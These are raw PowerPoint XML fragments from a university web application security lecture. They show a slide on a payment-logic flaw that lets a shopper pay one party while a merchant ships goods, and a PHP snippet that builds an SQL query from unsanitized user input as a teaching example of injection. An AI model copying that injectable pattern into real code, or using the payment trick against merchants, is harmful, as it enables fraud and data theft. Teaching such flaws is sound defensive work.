          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nopCommerce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + Amazon Simple Pay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16AB870F-7D7D-A043-921F-1720939C192C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="538295" y="4292960"/>
            <a:ext cx="4851485" cy="2068971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2000" kern="0" dirty="0"/>
              <a:t>Chuck’s trick:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2000" kern="0" dirty="0"/>
              <a:t>Checkout from Jeff but pay to “Mark” (Chuck himself or his puppet)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2000" kern="0" dirty="0"/>
              <a:t>Amazon tells Jeff that payment has been successful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2000" kern="0" dirty="0"/>
              <a:t>Jeff ships product</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{846F8EBF-4EC1-6D4B-8A8B-43CD8985E5AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7826798" y="473317"/>
            <a:ext cx="3868367" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Wang et al. “How To Shop for Free Online”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34365946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360"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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4"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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3"/>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9" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="1"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39938" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8813CAD8-AB0E-0C42-9C2B-95CFFBF28755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{678C1049-F755-2949-AA79-4B176EBDCB10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963691" y="1000370"/>
            <a:ext cx="6459486" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Widely used database query language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fetch a set of records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM Person WHERE Username=‘Vitaly’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add data to the table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO Key (Username, Key) VALUES (‘Vitaly’, 3611BBFF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE Keys SET Key=FA33452D WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PersonID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Query syntax (mostly) independent of vendor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18824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AEE4B3F-FC84-1A45-9909-7436301B2BA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Typical Query Generation Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254980" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2CC75B7-B938-9943-8795-BCDEEB2136E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>selecteduser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = $_GET['user']; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = "SELECT Username, Key FROM Key " . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            "WHERE Username='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>selecteduser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Oval 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23241B8C-9CE5-BC4D-BAB3-CC5E79E8B7BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4024952" y="2463966"/>
            <a:ext cx="1295400" cy="792162"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9FF9DC3-CB30-DC4B-A921-3538366FDB32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7237862" y="2259882"/>
            <a:ext cx="3775881" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What if ‘user’ is a malicious string that changes the meaning of the query?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1632430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3260</TotalTime>
  <Words>6348</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>725</Paragraphs>
  <Slides>77</Slides>
  <Notes>23</Notes>
  <HiddenSlides>4</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1" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Monotype Sorts</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Selawik Light</vt:lpstr>
      <vt:lpstr>Speak Pro</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>SavonVTI</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>WEB APPLICATION SECURITY  Vitaly Shmatikov</vt:lpstr>
      <vt:lpstr>Server Side of a Web Application</vt:lpstr>
      <vt:lpstr>PHP: Hypertext Preprocessor </vt:lpstr>
      <vt:lpstr>Command Injection in PHP</vt:lpstr>
      <vt:lpstr>More Command Injection in PHP</vt:lpstr>
      <vt:lpstr>Ruby’s OpenURI</vt:lpstr>
      <vt:lpstr>Every Input, Every Time</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>Typical Query Generation Code</vt:lpstr>
      <vt:lpstr>Typical Login Prompt</vt:lpstr>
      <vt:lpstr>User Inputs Becomes Part of Query</vt:lpstr>
      <vt:lpstr>Normal Login</vt:lpstr>
      <vt:lpstr>Malicious User Input</vt:lpstr>
      <vt:lpstr>SQL Injection Attack</vt:lpstr>
      <vt:lpstr>Exploits of a Mom</vt:lpstr>
      <vt:lpstr>SQL Injection: Basic Idea</vt:lpstr>
      <vt:lpstr>Authentication with Back-End DB</vt:lpstr>
      <vt:lpstr>Using SQL Injection to Log In</vt:lpstr>
      <vt:lpstr>Another SQL Injection Example</vt:lpstr>
      <vt:lpstr>Can Execute Commands</vt:lpstr>
      <vt:lpstr>Can Modify Critical Data</vt:lpstr>
      <vt:lpstr>Can Pull Data From Other Tables</vt:lpstr>
      <vt:lpstr>Second-Order SQL Injection</vt:lpstr>
      <vt:lpstr>CardSystems Solutions</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>In-Class Exercise </vt:lpstr>
      <vt:lpstr>Not Just SQL!</vt:lpstr>
      <vt:lpstr>Preventing  Injection ATTACKS</vt:lpstr>
      <vt:lpstr>Preventing SQL Injection</vt:lpstr>
      <vt:lpstr>Escaping Quotes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Prepared Statements</vt:lpstr>
      <vt:lpstr>Parameterized SQL in ASP.NET</vt:lpstr>
      <vt:lpstr>Echoing or “Reflecting” User Input</vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Basic Pattern for Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Adobe PDF Viewer  (before version 7.9)</vt:lpstr>
      <vt:lpstr>XSS Against PDF Viewer</vt:lpstr>
      <vt:lpstr>Not Scary Enough?</vt:lpstr>
      <vt:lpstr>Where Malicious Scripts Lurk</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Twitter Worm (2009)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Google Maps (2020)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Stored XSS Using Images</vt:lpstr>
      <vt:lpstr>XSS of the Third Kind</vt:lpstr>
      <vt:lpstr>XSS in Web 2.0</vt:lpstr>
      <vt:lpstr>XSS in AJAX (1)</vt:lpstr>
      <vt:lpstr>XSS in AJAX (2)</vt:lpstr>
      <vt:lpstr>“Backend” AJAX Requests</vt:lpstr>
      <vt:lpstr>XSS in AJAX (3)</vt:lpstr>
      <vt:lpstr>Using Login XSRF for XSS</vt:lpstr>
      <vt:lpstr>Preventing  CROSS-SITE SCRIPTING</vt:lpstr>
      <vt:lpstr>How to Protect Yourself</vt:lpstr>
      <vt:lpstr>What Does This Script Do?</vt:lpstr>
      <vt:lpstr>Sanitizing Inputs</vt:lpstr>
      <vt:lpstr>Evading  XSS Filters</vt:lpstr>
      <vt:lpstr>MySpace Worm (1)</vt:lpstr>
      <vt:lpstr>MySpace Worm (2)</vt:lpstr>
      <vt:lpstr>Code of the MySpace Worm</vt:lpstr>
      <vt:lpstr>31 Flavors of XSS</vt:lpstr>
      <vt:lpstr>Problems with Filters</vt:lpstr>
      <vt:lpstr>Simulation Errors in Filters</vt:lpstr>
      <vt:lpstr>httpOnly Cookies</vt:lpstr>
      <vt:lpstr>Using CSP to Whitelist Origins</vt:lpstr>
      <vt:lpstr>User Input Validation</vt:lpstr>
      <vt:lpstr>Client-Side Validation</vt:lpstr>
      <vt:lpstr>Problem: Client Is Untrusted</vt:lpstr>
      <vt:lpstr>Online Shopping</vt:lpstr>
      <vt:lpstr>Online Banking</vt:lpstr>
      <vt:lpstr>IT Support</vt:lpstr>
      <vt:lpstr>Cashier-as-a-Service</vt:lpstr>
      <vt:lpstr>nopCommerce + Amazon Simple Pay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security</dc:title>
  <dc:subject/>
  <dc:creator>Vitaly Shmatikov</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vitaly Shmatikov</cp:lastModifiedBy>
  <cp:revision>335</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-13T21:02:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-04T23:23:28Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>